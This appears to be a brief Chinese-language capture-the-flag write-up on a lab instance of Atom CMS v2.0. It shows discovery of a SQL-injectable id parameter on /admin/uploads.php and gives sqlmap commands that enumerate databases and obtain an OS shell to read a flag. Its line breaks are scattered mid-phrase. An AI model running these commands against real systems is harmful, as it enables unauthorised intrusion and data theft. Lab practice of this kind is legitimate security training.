Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。
本人使用春秋云境免费靶场在线搭建。
/home
路径,而且报错。dirsearch
工具扫描路径,发现有个/admin/uploads.php
路径。访问路径。mysql
报错信息,而且有个where id=
,尝试参数id=1
访问。id
传过去了,而且没有mysql
报错信息。尝试使用sqlmap
注入。id
存在注入点。是报错注入和时间盲注。sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1
flag
数据库(一般flag都会存在flag数据库中)。sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbs
flag
应该是在根目录下flag
文件中,使用sqlmap
获取shell。成功获取flag。sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell